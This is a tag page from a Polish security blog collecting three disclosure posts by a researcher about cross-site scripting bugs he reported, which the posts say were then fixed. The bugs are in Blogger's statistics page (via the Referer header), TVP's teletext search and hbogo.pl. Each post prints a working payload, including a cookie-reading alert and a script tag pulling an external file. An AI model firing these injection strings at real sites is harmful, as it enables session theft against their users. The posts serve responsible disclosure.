Pokazywanie postów oznaczonych etykietą reflected xss. Pokaż wszystkie posty
Pokazywanie postów oznaczonych etykietą reflected xss. Pokaż wszystkie posty

czwartek, 14 lutego 2013

XSS in... Blogger ;-)

Dwa miesiące temu w ramach programu bug bounty Google znalazłem błąd stored XSS w usłudze Blogger, z której właśnie macie przyjemność korzystać :-) Celem wyjaśnienia - bo o tym nie wspomniałem - oczywiście chodzi o modyfikacje nagłówka Referer podczas wejścia na bloga. Poniżej treść oryginalnego zgłoszenia i screenshoty.


Hello there!

I'm happy to tell, that I just found cross-site scripting bug in your blogger service. 

When we put in Referer header something like this:

http://q-x.ath.cx/test'onclick="alert(document.cookie);"

And go to our blog page, our Statistic page will generate this kind of code:

<a target="_blank" href="http://q-x.ath.cx/test" onclick="alert(document.cookie);" '="">http://q-x.ath.cx/test'onclick="alert(document.cookie);"</a>
After clicking - we'll see alert :) You've got some screenshots in attachment.

Waiting for feedback, cheers!
Jakub Żoczek







Błąd oczywiście został błyskawicznie poprawiony.

wtorek, 18 grudnia 2012

Telegazeta TVP - XSS

Wbrew sugestiom jednego z kolegów wyprzedzam pytania - nie, nie znalazłem XSS'a przy pomocy telewizora ;-)

Na stronie telegazety TVP - prosty błąd XSS. Po 12 godzinach (licząc od północy) błąd został poprawiony.

Payload:

http://telegazeta.tvp.pl/szukaj.php?mode=adv&cat=&searchatt[0]=&check[0]=&att[0]=0&searchatt[1]=%22%3E%3Cimg%20src=a%20onerror=alert%28document.location%29%3Ehh

...oraz screenshot:




poniedziałek, 17 grudnia 2012

Reflected XSS w HBOGO

Na stronie http://hbogo.pl jakiś czas temu znalazłem reflected xss'a. Zaraz po jego zgłoszeniu nastąpił błyskawiczny kontakt ze strony pracownika firmy, zgłoszenie oraz poprawka. W ramach podziękowania otrzymałem gadżety - voucher, dwa energetyki, mnóstwo krówek i chyba cały sezon Imperium na DVD. Taki kontakt mi się podoba! No i będzie co oglądać ;-)

Przykładowy payload...

http://www.hbogo.pl/vip/template.aspx?id=test%3Cscript%20src=%22http://some-server/SOME-SCRIPT.JS%22%3E%3C/script%3E

...efekt wywołania URL:




No i gadżety ;-)



Niebawem kolejne 'znaleziska'. Pozdrawiam!